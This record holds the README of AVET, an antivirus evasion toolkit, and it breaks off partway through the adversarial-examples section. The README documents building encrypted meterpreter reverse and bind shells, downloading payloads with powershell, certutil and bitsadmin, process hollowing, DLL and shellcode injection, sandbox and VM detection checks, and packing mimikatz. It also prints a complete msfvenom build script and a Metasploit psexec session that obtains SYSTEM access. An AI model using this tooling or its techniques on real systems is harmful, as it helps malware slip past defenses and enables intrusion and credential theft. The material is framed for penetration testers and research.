{"id":13474555,"url":"https://github.com/govolution/avet","last_synced_at":"2025-05-15T17:08:06.751Z","repository":{"id":41243227,"uuid":"80290293","full_name":"govolution/avet","owner":"govolution","description":"AntiVirus Evasion Tool","archived":false,"fork":false,"pushed_at":"2023-10-12T15:00:05.000Z","size":4693,"stargazers_count":1694,"open_issues_count":1,"forks_count":338,"subscribers_count":86,"default_branch":"master","last_synced_at":"2025-04-18T18:35:29.738Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/govolution.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-01-28T14:56:47.000Z","updated_at":"2025-04-18T17:36:16.000Z","dependencies_parsed_at":"2023-10-12T23:01:24.126Z","dependency_job_id":null,"html_url":"https://github.com/govolution/avet","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/govolution%2Favet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/govolution","download_url":"https://codeload.github.com/govolution/avet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254384988,"owners_count":22062422,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T16:01:13.149Z","updated_at":"2025-05-15T17:08:01.736Z","avatar_url":"https://github.com/govolution.png","language":"Shell","readme":"# AntiVirus Evasion Tool\n\n\nAVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques, as well as other methods used by malicious software.\nFor an overview of new features in **v2.4**, as well as past version increments, have a look at the **CHANGELOG** file.\n\n\n## Table of Contents\n- [Installation](#installation)\n- [Docker](#docker)\n- [AVET the easy way](#avet-the-easy-way)\n- [AVET the normal way](#avet-the-normal-way)\n- \u003cdetails\u003e\u003csummary\u003eDocumentation (\u003ci\u003eclick to expand\u003c/i\u003e)\u003c/summary\u003e\n\n  - [Data retrieval methods](#data-retrieval-methods)\n  - [Encryption and Encoding](#encryption-and-encoding)\n  - [Sandbox evasion](#sandbox-evasion)\n  - [Additional command execution](#additional-command-execution)\n  - [Helper tools](#helper-tools)\n  - [AVET \u0026 metasploit psexec](#avet-\u0026-metasploit-psexec)\n  - [Adversarial Examples](#adversarial-examples)\n  \u003c/details\u003e\n- [More](#more)\n\n\n### Some features\n- when running a .exe file made with msfpayload \u0026 co, the file will often be recognized by antivirus software\n- AVET is an antivirus evasion tool targeting windows machines with executable files\n- different kinds of input payloads can be used now: shellcode, exe and dlls\n- more techniques available: shellcode/dll injection, process hollowing and more\n- flexible retrieval methods for payload, decryption key, etc.\n- usage as a dropper\n- Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary\n- combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques\n- basic sandbox checks\n- generation of adversarial examples against static detectors based on machine learning\n- execute all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of \"malicious\" samples using different evasion and injection techniques\n\n\n### Important Note\n\nNot all techniques will evade every AV engine. If one technique or build script does not work, please test another one.\nFeel free to experiment! After all this is a toolbox - yet you should wield the hammer yourself.\n\n## Installation\n\n__The Installtion Instruction applies for Kali 64bit and tdm-gcc!__\n\nYou can use the setup script:\n```bash\n./setup.sh\n```\n\nThis should automatically get you started by installing/configuring wine and installing tdm-gcc.\nYou'll shortly have to click through the tdm-gcc installer GUI though - standard settings should be fine.\nThe script will also ask if you want to install AVET's dependencies, which are needed to use some of the build scripts. The fetched dependencies will be put into separate folders next to the avet folder.\n\n\nDependencies will grab the latest releases of:\n- [pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)\n- [mimikatz](https://github.com/gentilkiwi/mimikatz)\n- [DKMC](https://github.com/Mr-Un1k0d3r/DKMC)\n\n\nIf for whatever reason you want to install wine and tdm-gcc manually:\n- [How to install tdm-gcc with wine](https://govolution.wordpress.com/2017/02/04/using-tdm-gcc-with-kali-2/)\n\n## Docker\n\nIf you are not using Kali or don't want to install Metasploit on your system, you can use the Docker Container instead.\nThe container encapsulates Metasploit and avet and the samples will be created in your current directory.\nIt is also possible to use an graphical text editor like gedit.\n\nBuilding the container:\n```bash\nsudo docker build -t avet:v0.1 .\n```\nUsage:\n```bash\nsudo docker run -it --net=host --env=\"DISPLAY\" --volume=\"$HOME/.Xauthority:/root/.Xauthority:rw\" -v $(pwd):/tools/avet/output avet:v0.1 /bin/bash\n```\nFor a better experience it is recommend to alias this.\n```bash\n# In your .bash_profile, .bashrc or .bash_aliases\n\nalias avet='sudo docker run -it --net=host --env=\"DISPLAY\" --volume=\"$HOME/.Xauthority:/root/.Xauthority:rw\" -v $(pwd):/tools/avet/output avet /bin/bash'\n```\n\n\n## AVET the easy way\n\n**avet.py** is a small Python utility which was designed to assist you in using the tool.\n\nIt lists all scripts that are currently present in the build folder. After selecting one, you will be able to step through the script line by line, having the opportunity to modify the contents on the fly.\n\nThe latter is especially useful as you can define new LHOST and LPORT variables for msfvenom each time you run a build script via the fabric. \nYou can define default LHOST and LPORT values in the `/build/global_connect_config.sh` file, which are used if you don't redefine.\n\nThese modifications are temporary, which means that any changes you made will not persist in the build script on disk.\nThe modified version is executed once, and your executable built.\n\n\u003cdetails\u003e\n\u003csummary\u003eHere is a quick example (\u003ci\u003eClick to expand\u003c/i\u003e):\u003c/summary\u003e\n\n```\npython3 avet.py\n\n                       .|        ,       +\n             *         | |      ((             *\n                       |'|       `    ._____\n         +     ___    |  |   *        |.   |' .---\"|\n       _    .-'   '-. |  |     .--'|  ||   | _|    |\n    .-'|  _.|  |    ||   '-__  |   |  |    ||      |\n    |' | |.    |    ||       | |   |  |    ||      |\n ___|  '-'     '    \"\"       '-'   '-.'    '`      |____\njgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n\nWelcome to the avet Assistant!\n\n0 : build_40xshikata_revhttpsunstaged_win32.sh\n1 : build_50xshikata_quiet_revhttps_win32.sh\n2 : build_50xshikata_revhttps_win32.sh\n3 : build_asciimsf_fromcmd_revhttps_win32.sh\n4 : build_asciimsf_revhttps_win32.sh\n5 : build_avetenc_dynamicfromfile_revhttps_win32.sh\n6 : build_avetenc_fopen_revhttps_win32.sh\n7 : build_avetenc_mtrprtrxor_revhttps_win64.sh\n8 : build_calcfromcmd_50xshikata_revhttps_win32.sh\n9 : build_calcfrompowersh_50xshikata_revhttps_win32.sh\n10 : build_checkdomain_rc4_mimikatz.sh\n11 : build_cpucores_revhttps_win32.sh\n12 : build_disablewindefpsh_xorfromcmd_revhttps_win64.sh\n13 : build_dkmc_downloadexecshc_revhttps_win32.sh\n14 : build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh\n15 : build_downloadbitsadmin_revhttps_win32.sh\n16 : build_downloadcertutil_revhttps_win32.sh\n17 : build_downloadcurl_mtrprtrxor_revhttps_win64.sh\n18 : build_downloadiexplorer_revhttps_win32.sh\n19 : build_downloadpsh_revhttps_win32.sh\n20 : build_downloadsocket_mtrprtrxor_revhttps_win64.sh\n21 : build_downloadsocket_revhttps_win32.sh\n22 : build_dynamicfromfile_revhttps_win32.sh\n23 : build_fibonacci_rc4_mimikatz.sh\n24 : build_fopen_mtrprtrxor_revhttps_win64.sh\n25 : build_fopen_quiet_revhttps_win32.sh\n26 : build_fopen_revhttps_win32.sh\n27 : build_getchar_rc4_mimikatz.sh\n28 : build_gethostbyname_revhttps_win32.sh\n29 : build_hasvmkey_revhttps_win32.sh\n30 : build_hasvmmac_revtcp_win32.sh\n31 : build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh\n32 : build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh\n33 : build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh\n34 : build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh\n35 : build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh\n36 : build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh\n37 : build_kaspersky_fopen_shellrevtcp_win32.sh\n38 : build_mimikatz_pe2shc_xorfromcmd_win64.sh\n39 : build_pause_rc4_mimikatz.sh\n40 : build_rc4_interactive_pwsh_mimikatz_win64.sh\n41 : build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh\n42 : build_rc4enc_mimikatz_win64.sh\n43 : build_sleep_rc4_mimikatz.sh\n44 : build_sleepbyping_rc4_mimikatz.sh\n45 : build_timedfibonacci_rc4_mimikatz.sh\n46 : buildsvc_20xshikata_bindtcp_win32.sh\n\nWhich Script would you like to configure and build?\nEnter the corresponding number -\u003e 43\n\nDESCRIPTION :\n# RC4-encrypt the payload with a static, preset key.\n# Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode.\n# pe_to_shellcode is written by Hasherezade:\n# https://github.com/hasherezade/pe_to_shellcode\n\n# This script expects the Mimikatz executable to be at input/mimikatz.exe\n# and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe\n\nConfigure the Build Script\n\n# enable debug output\n-\u003e enable_debug_print\n\n# generate key file with preset key\n-\u003e generate_key preset aabbccdd1122\n\nDo you want to add sandbox evasions? [y/N]\n-\u003e N\n\nExecutable will be created Shortly please wait.\n\n*** ============================================= ***\n\n         .==,_                                          \n        .===,_`\\\\                                        \n      .====,_ ` \\\\      .====,__                         \n---     .==-,`~. \\\\           `:`.__,                    \n ---      `~~=-.  \\\\           /^^^     MEEP MEEP        \n   ---       `~~=. \\\\         /                          \n                `~. \\\\       /                           \n                  ~. \\\\____./                            \n                    `.=====)                            \n                 ___.--~~~--.__                         \n       ___\\\\.--~~~              ~~~---.._|/              \n       ~~~\\\\\\\"                             /              \n\n ________  ___      ___ _____  __________  \n|\\   __  \\|\\  \\    /  /|\\  __\\ |\\___   __\\ \n\\ \\  \\|\\  \\ \\  \\  /  / | \\ \\__ \\|__|\\  \\_| \n \\ \\   __  \\ \\  \\/  / / \\ \\  _\\    \\ \\  \\  \n  \\ \\  \\ \\  \\ \\    / /   \\ \\ \\___   \\ \\  \\ \n   \\ \\__\\ \\__\\ \\__/ /     \\ \\____\\   \\ \\__\\\n    \\|__|\\|__|\\|__|/       \\|_____|   \\|__|\n\n*** ============================================= ***\n\nReading module from: input/mimikatz.exe\n[WARNING] This is a console application! The recommended subsystem is GUI.\n[+] Saved as: input/sc_raw.txt\nStarting RC4 encoder...\nReading payload from file input/sc_raw.txt, expecting raw format.\npayload size in bytes is 1309884\nReading key from file input/key_raw.txt, expecting raw format.\nKey length in bytes is 6\nApplying RC4 algorithm\nWriting payload to file input/sc_enc_raw.txt\n\n# The decryption key is aabbccddee if it has not been changed.\n# You need to provide the decryption key as 2nd command line argument.\n# Call generated executable on target like:\n# $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee']  [decryption key]\n\n\nYour executable should be in the output folder!\n```\n\u003c/details\u003e\n\n## AVET the normal way\n\nOf course it is possible to run all commands step by step from command line. However, in the \"build\" folder you will find preconfigured build scripts for relevant use cases. \nThe build scripts themselves are written so as they have to be called from within the avet directory:\n```bash\nkali@kali:~/tools/avet$ ./build/build_fopen_mtrprtrxor_revhttps_win64.sh\n```\n\nYou can define default LHOST and LPORT values for metasploit payloads in the `/build/global_connect_config.sh` file, which are used if you don't redefine.\n\n\n### Usage examples\n\nGenerate a 32-bit process hollowing executable in two steps (as in build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win32.sh):\n\nFirst, generate the hollowing payload with AVET:\n- generate meterpreter/reverse_https 32-bit shellcode\n- the meterpreter shellcode will be XOR encrypted with a 5-byte preset key\n- the shellcode will be compiled into the generated executable\n- fopen and gethostbyname sandbox evasion environmental checks will be made before executing the shellcode\n\t\nSecond, build the \"dropper\" executable that delivers the first step payload via hollowing:\n- statically compile the first step payload into the executable\n- the payload will be XOR encrypted with a different 5-byte preset key\n- again, fopen and gethostbyname sandbox evasion environmental checks will be made before hollowing\n- the hollowing target PID will be delivered via command line argument on execution time\n\t\nSo you get a two-layer environmental-checked and encrypted meterpreter payload, hollowed into a process of your choice.\nWhile the settings in the build script are mostly for demonstration purposes, there is a lot of flexibility to customize your generated executable by making simple modifications to the build script.\n\nYou could switch out data retrieval methods: Instead of statically compiling most data into the executable, you could download your hollowing payload via powershell, download the decryption key via sockets, use different encryption or environmental checks, etc.\n\nOr try to add more evasion layers by doing a third build iteration.\nOr switch out the payload. Want to use Mimikatz instead? Convert it into shellcode via https://github.com/hasherezade/pe_to_shellcode, and change the payload in the build script.\n\nOf course, you can also design more minimalistic builds, like executing unencrypted shellcode with only one environmental check, or maybe 50 iterations of shikata are enough to reach your goal?\nChoose/modify the build scripts, suiting your needs.\n\n\n### Build scripts\n\nBelow, find a list of all currently shipped build scripts. The names should hint at each script's functionality.\nFor detailed information, consider the comments inside the scripts.\nFeel free to modify/write your own build scripts to build your custom executable!\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003ci\u003eClick to expand\u003c/i\u003e\u003c/summary\u003e\n\n  ```\n  build_40xshikata_revhttpsunstaged_win32.sh\n  build_50xshikata_revhttps_win32.sh\n  build_50xshikata_quiet_revhttps_win32.sh\n  build_asciimsf_fromcmd_revhttps_win32.sh\n  build_asciimsf_revhttps_win32.sh\n  build_avetenc_dynamicfromfile_revhttps_win32.sh\n  build_avetenc_fopen_revhttps_win32.sh\n  build_avetenc_mtrprtrxor_revhttps_win64.sh\n  build_calcfromcmd_50xshikata_revhttps_win32.sh\n  build_calcfrompowersh_50xshikata_revhttps_win32.sh\n  build_cpucores_revhttps_win32.sh\n  build_checkdomain_rc4_mimikatz.sh\n  build_disablewindefpsh_xorfromcmd_revhttps_win64.sh\n  build_dkmc_downloadexecshc_revhttps_win32.sh\n  build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh\n  build_downloadbitsadmin_revhttps_win32.sh\n  build_downloadcertutil_revhttps_win32.sh\n  build_downloadcurl_mtrprtrxor_revhttps_win64.sh\n  build_downloadiexplorer_revhttps_win32.sh\n  build_downloadpsh_revhttps_win32.sh\n  build_downloadsocket_mtrprtrxor_revhttps_win64.sh\n  build_downloadsocket_revhttps_win32.sh\n  build_dynamicfromfile_revhttps_win32.sh\n  build_fibonacci_rc4_mimikatz.sh\n  build_fopen_mtrprtrxor_revhttps_win64.sh\n  build_fopen_quiet_revhttps_win32.sh\n  build_fopen_revhttps_win32.sh\n  build_getchar_rc4_mimikatz.sh\n  build_gethostbyname_revhttps_win32.sh\n  build_hasvmkey_revhttps_win32.sh\n  build_hasvmmac_revtcp_win32.sh\n  build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh\n  build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh\n  build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh\n  build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh\n  build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh\n  build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh\n  build_kaspersky_fopen_shellrevtcp_win32.sh\n  build_mimikatz_pe2shc_xorfromcmd_win64.sh\n  build_pause_rc4_mimikatz.sh\n  build_rc4_interactive_pwsh_mimikatz_win64.sh\n  build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh\n  build_rc4enc_mimikatz_win64.sh\n  build_sleep_rc4_mimikatz.sh\n  build_sleepbyping_rc4_mimikatz.sh\n  build_timedfibonacci_rc4_mimikatz.sh\n  buildsvc_20xshikata_bindtcp_win32.sh\n  ```\n\u003c/details\u003e\n\n\n## Documentation\n\n### Data retrieval methods\nThese methods are compatible with all of AVET's data sources and can be used as such in the build script.\n\nA few examples:\n```\n# Compiles the command 'calc.exe' statically into the executable, which will then be executed via cmd at sample startup.\nset_command_source static_from_here 'calc.exe'\nset_command_exec exec_via_cmd\n\n# Download 64-bit shellcode via powershell, and execute. \nset_payload_source download_powershell\nset_payload_execution_method exec_shellcode64\n\n# Download XOR decryption key into memory. (Server to download from is always specified via first command line argument on execution). Decode the payload.\nset_key_source download_socket\nset_decoder xor\n\n# Retrieves the tuple (target PID, dll path) from command line on execution\nset_payload_info_source from_command_line_raw\nset_payload_execution_method inject_dll\n```\nIf features are skipped/not used, you have to specify NOP-like behavior instead:\n```\nset_command_source no_data\nset_command_exec no_command\n```\n\n#### static_from_file\nThe data is retrieved from a file and is statically compiled into the generated executable.\nFor this to work, the data must be provided as a c-style array at compilation time, like\n```\nunsigned char buf[] = \"\\x00\\x11\\x22\\x33\";\n```\n\n#### static_from_here\nThe data is statically compiled into the generated executable,\nretrieved from the specified argument in the build script.\n\n#### dynamic_from_file\nThe data is read from a file at run time.\n\n#### from_command_line_hex\nRetrieves data from a \"11aabb22..\" format hex string (from the command line).\n\n#### from_command_line_raw\nRetrieves data from a command line argument. The given ASCII string is interpreted as raw byte data.\n\n#### download_certutil\nDownloads data from a specified URI, using ```certutil.exe -urlcache -split -f```.\nDrops the downloaded file to disk before reading the data.\n\n#### download_curl\nDownloads the data using curl.\nDrops the downloaded file to disk before reading the data.\n\n#### download_internet_explorer\nDownloads data from a specified URL, using Internet Explorer.\nDrops the downloaded file to disk before reading the data.\n\n#### download_powershell\nDownloads data from a specified URI via powershell.\nDrops the downloaded file to disk before reading the data.\n\n#### download_socket\nDownloads the data from a specified URI, using sockets.\nData is read directly into memory, no file is dropped to disk.\n\n#### download_bitsadmin\nDownloads the data using the BITSAdmin Windows utility.\nDrops the downloaded file to disk before reading the data.\n\n\n### Payload execution methods\nHow to execute/deliver the payload. The injection/hollowing methods require additional information about the injection target, which can be given via ```set_payload_info_source \u003cthe_info\u003e``` (see data retrieval methods).\n\n#### exec_shellcode\nExecutes 32-bit shellcode with a C function binding.\n\n#### exec_shellcode64\nExecutes 64-bit shellcode with a C function binding and VirtualProtect.\n\n#### exec_shellcode_ASCIIMSF\nExecutes ASCIIMSF encoded shellcode via ```call eax```.\n\n#### hollowing32\nInstanciates a new process, cuts out the original image and hollows the given payload into the new process.\nThe payload is a 32-bit executable image. Works on 32-bit targets.\n\n#### hollowing64\nSame as hollowing32, but using 64-bit PE payloads for 64-bit target processes.\n\n#### inject_dll\nInjects a dll into a target process, using ```CreateRemoteThread```.\nInjection works for 32-bit payloads into 32-bit processes, and 64-bit payloads into 64-bit processes, respectively.\n\n#### inject_shellcode\nInjects shellcode into a target process, using ```CreateRemoteThread```.\nInjection works for 32-bit shellcode into 32-bit processes, and 64-bit shellcode into 64-bit processes, respectively.\n\n\n### Encryption and Encoding\nAVET provides encoders for each scheme, which can be applied on the payload before compilation/delivery.\nOn execution, the specified decoder then again deobfuscates the payload at runtime.\n\nHere is an RC4 example, where the decryption key is retrieved from the command line in hex format at execution time:\n```\ngenerate_key preset aabbccddee input/key_raw.txt\nencode_payload rc4 input/shellcode_raw.txt input/shellcode_enc_raw.txt input/key_raw.txt\nset_key_source from_command_line_hex\nset_decoder rc4\n```\n\nYou can also skip the encoding feature by not further encoding the shellcode, and setting:\n```\nset_key_source no_data\nset_decoder none\n```\n\n#### xor\nRolling XOR, supporting multi-byte keys.\n\n#### avet\nCustom encoding, reinterpreting the ASCII format.\n\n#### rc4\nRC4 encryption/decryption, with flexible key length.\n\n\n### Debugger and Sandbox evasion\nThese are environmental checks that are performed before eventual encoding and payload execution.\nIf an unpleasant execution environment is detected (e.g. an AV sandbox), execution stops.\n\nCurrently, you can arbitrarily queue up to 10 checks. Using the same technique multiple times is supported.\nThe queue limit *EVASION_ARRAY_SIZE* can however be easily modified in *avet.c*.\n\n#### is debugger present\nCheck with isDebuggerPresent() function if a debugger is present.\nExit if true.\n```\nadd_evasion is_debugger_present\n```\n\n#### sleep\nSleep for certain time before execution. The duration(in Seconds) can be specified in the build script, like\n\n```\n# sleep for 3 seconds\nadd_evasion evasion_by_sleep 3\n```\n\n#### sleep by ping\nHalt execution of the program for specified seconds by invoking a timed ping command against localhost.\nThe program pings once each second.\n```\nadd_evasion sleep_by_ping 4\n```\n\n#### check fast forwarding\nCheck if sandbox utilize fast forwarding to reduce heuristic check time. Local time and sleep is used.\n```\nadd_evasion check_fast_forwarding\n```\n\n#### get tickcount\nCheck if sandbox utilize fast forwarding to reduce heuristic check time. Uptime and sleep is used.\n```\nadd_evasion get_tickcount\n```\n\n#### Username\nGet username and compare with given username. Exit if it does not match.\n\n```\nadd_evasion has_username 'IEUser'\n```\n\n#### Messagebox\nSpawn simple Messagebox before execution. If Arithmetic is not solved correctly, the program exits.\n```\nadd_evasion interaction_msg_box\n```\n\n#### getchar\nWait until input is delivered using getchar.\n```\nadd_evasion interaction_getchar\n```\n\n#### system pause\nExecute system(\"pause\"), causing the spawned cmd (and our main process) to wait for any keypress.\n```\nadd_evasion interaction_system_pause\n```\n\n#### fopen\nChecks for the existence of a file. If not found, stop execution.\nThe file name can be specified in the build script, like\n```\nadd_evasion fopen_sandbox_evasion 'c:\\\\windows\\\\system.ini'\n```\n\n#### bios info\nChecks if it is possible to fetch SMBIOS firmware table. Stop execution if not.\n\n```\nadd_evasion get_bios_info\n```\n\n#### gethostbyname\nTry to resolve a hostname of your choice. If gethostbyname returns unequals NULL, stop execution.\nThe hostname to check against can be specified in the build script, like\n```\nadd_evasion gethostbyname_sandbox_evasion 'testdomain.com'\n```\n\n#### get_cpu_cores\nChecks number of CPU cores on the target. If the number is lower than the specified value, stop execution.\n```\nadd_evasion get_cpu_cores 2\n```\n\n#### has_vm_mac\nChecks for vendor-specific MAC prefixes. If any identified, stop execution.\n```\nadd_evasion has_vm_mac\n```\n\n#### has_vm_regkey\nChecks for vendor-specific registry keys. If any identified, stop execution.\n```\nadd_evasion has_vm_regkey\n```\n\n#### hide_console\nNot really an evasion technique, but hides your console window ;)\n```\nadd_evasion hide_console\n```\n\n#### Installation Date\nFetch Installation date of Windows and compare it to the specified one. If the dates do not match, stop execution. The date needs to be specified in format dd/mm/yyyy.\n\n```\nadd_evasion get_install_date '24/11/2007'\n```\n\n#### Number of Processes\nCount the number of running Processes. If the number of the processes is smaller than given threshold, stop execution.\n\n```\nadd_evasion get_num_processes 50\n```\n\n#### Standard Browser\nRead Registry Key to get the default Browser. If the Browser does not match with given value, stop execution. Possible values are  MSEdgeHTM, Firefox or ChromeHTML.\n\n```\nadd_evasion get_standard_browser 'Firefox'\n```\n\n#### Domain\nQueries the DNS domain the target is in.\nIf the target is not in the expected domain as specified, the program exits.\n```\nadd_evasion get_computer_domain 'domain.com'\n```\n\n#### Computation\nFibonacci\n\nCompute specified iterations of the Fibonacci series.\nWill likely produce false results for greater n due to integer boundaries.\n```\n# 10 iterations\nadd_evasion computation_fibonacci 10\n```\n\nTimed Fibonacci\n\nStops Fibonacci computations after approximately specified seconds.\n```\n# Stops computation after 20 seconds\nadd_evasion computation_timed_fibonacci 20\n```\n\n\n#### Folders and more\nCheck if Artifact exists, stop execution if not. Paths must be in Unix style.\n\nBackground wallpaper:\n```\nadd_evasion has_background_wp\n```\n\n\nCheck for folder:\n```\nadd_evasion has_folder 'C:/Users/user/Downloads/'\n```\n\nCheck for Public Desktop:\n```\nadd_evasion has_public_desktop\n```\n\nCheck for Recycle Bin\n```\nadd_evasion has_recycle_bin\n```\n\nCheck for recent file folder\n```\nadd_evasion has_recent_files\n```\n\nCheck for network drive\n```\nadd_evasion has_network_drive\n```\n\n\n### Additional command execution\nGrants you the ability to execute an additional cmd/powershell payload directly after the eventual sandbox evasion functions.\nThe payload source is compatible with AVET's data retrieval methods.\n\nThe following example downloads a powershell payload via BITSAdmin: \n```\nset_command_source download_bitsadmin\nset_command_exec exec_via_powershell\n```\n\n\n### Helper tools\n\n#### data_raw_to_c\nTakes raw data as input from a file, converts it into C-array format and writes output to another file.\nThis aids in providing the correct format for the static_from_file data retrieval method.\n\n#### generate_key\nKey generation utility. Generates either a (non-cryptographically) random key or takes a preset key as input,\nand outputs the raw key data into a specified file.\nThis aids in providing key material for the AVET encryption feature.\n\n#### sh_format\nUtility from AVET 1.3 that performs AVET encoding.\n\n\n## AVET \u0026 metasploit psexec\n\nAVET is compatible to metasploit's psexec module. For that, the generated executable needs to be compiled as a Windows Service, which is implemented by using *avetsvc.c*. Consider the corresponding example build script\n\n*build_svc_20xshikata_bindtcp_win32.sh*:\n\n```\n#!/bin/bash          \n# Designed for use with msf psexec module!\n\n# print AVET logo\ncat banner.txt\n\n# include script containing the compiler var $win32_compiler\n# you can edit the compiler in build/global_win32.sh\n# or enter $win32_compiler=\"mycompiler\" here\n. build/global_win32.sh\n\n# import global default lhost and lport values from build/global_connect_config.sh\n. build/global_connect_config.sh\n\n# override connect-back settings here, if necessary\nLPORT=$GLOBAL_LPORT\n\n# make meterpreter bind payload, encoded 20 rounds with shikata_ga_nai\nmsfvenom -p windows/meterpreter/bind_tcp lport=$LPORT -e x86/shikata_ga_nai -i 20 -f raw -a x86 --platform Windows \u003e input/sc_raw.txt\n\n# import feature construction interface\n. build/feature_construction.sh\n\n# add evasion techniques\nadd_evasion fopen_sandbox_evasion 'c:\\\\windows\\\\system.ini'\nadd_evasion gethostbyname_sandbox_evasion 'this.that'\n\n# generate key file\ngenerate_key preset aabbcc12de input/key_raw.txt\n\n# encode shellcode\nencode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt\n\n# array name buf is expected by static_from_file retrieval method\n./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf\n\n# no command preexec\nset_command_source no_data\nset_command_exec no_command\n\n# set shellcode source\nset_payload_source static_from_file input/scenc_c.txt\n\n# convert generated key from raw to C into array \"key\"\n./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key\n\n# set key source\nset_key_source static_from_file input/key_c.txt\n\n# set payload info source\nset_payload_info_source no_data\n\n# set decoder\nset_decoder xor\n\n# set shellcode binding technique\nset_payload_execution_method exec_shellcode\n\n# enable debug printing\nenable_debug_print to_file C:/avetdbg.txt\n\n# compile as service\n$win32_compiler -o output/service.exe source/avetsvc.c -lws2_32\nstrip output/service.exe\n\n# cleanup\ncleanup_techniques\n```\n\nAnd on the metasploit side:\n```\nmsf exploit(psexec) \u003e use exploit/windows/smb/psexec\nmsf exploit(psexec) \u003e set EXE::custom /root/tools/ave/pwn.exe\nEXE::custom =\u003e /root/tools/ave/pwn.exe\nmsf exploit(psexec) \u003e set payload windows/meterpreter/bind_tcp\npayload =\u003e windows/meterpreter/bind_tcp\nmsf exploit(psexec) \u003e set rhost 192.168.116.183\nrhost =\u003e 192.168.116.183\nmsf exploit(psexec) \u003e set smbuser dax\nsmbuser =\u003e dax\nmsf exploit(psexec) \u003e set smbpass test123\nsmbpass =\u003e test123\nmsf exploit(psexec) \u003e set lport 8443\nlport =\u003e 8443\nmsf exploit(psexec) \u003e run\n\n[*] 192.168.116.183:445 - Connecting to the server...\n[*] Started bind handler\n[*] 192.168.116.183:445 - Authenticating to 192.168.116.183:445 as user 'dax'...\n[*] Sending stage (957487 bytes) to 192.168.116.183\n[*] 192.168.116.183:445 - Selecting native target\n[*] 192.168.116.183:445 - Uploading payload...\n[*] 192.168.116.183:445 - Using custom payload /root/tools/avepoc/a.exe, RHOST and RPORT settings will be ignored!\n[*] 192.168.116.183:445 - Created \\mzrCIOVg.exe...\n[+] 192.168.116.183:445 - Service started successfully...\n[*] 192.168.116.183:445 - Deleting \\mzrCIOVg.exe...\n[-] 192.168.116.183:445 - Delete of \\mzrCIOVg.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)\n[*] Exploit completed, but no session was created.\nmsf exploit(psexec) \u003e [*] Meterpreter session 4 opened (192.168.116.142:33453 -\u003e 192.168.116.183:8443) at 2017-05-27 18:47:23 +0200\n\nmsf exploit(psexec) \u003e sessions\n\nActive sessions\n===============\n\nId Type Information Connection\n-- ---- ----------- ----------\n4 meterpreter x86/windows NT-AUTORIT_T\\SYSTEM @ DAX-RYMZ48Z3EYO 192.168.116.142:33453 -\u003e 192.168.116.183:8443 (192.168.116.183)\n\nmsf exploit(psexec) \u003e sessions -i 4\n[*] Starting interaction with 4...\n\nmeterpreter \u003e sysinfo\nComputer : DAX-RYMZ48Z3EYO\nOS : Windows XP (Build 2600, Service Pack 3).\nArchitecture : x86\nSystem Language : de_DE\nDomain : ARBEITSGRUPPE\nLogged On Users : 2\nMeterpreter : x86/windows\n```\n## Adversarial Examples\nAdversarial examples are specifically crafted inputs with the purpose of leading machine learning models to misclassification.\n\nTo use this method, please 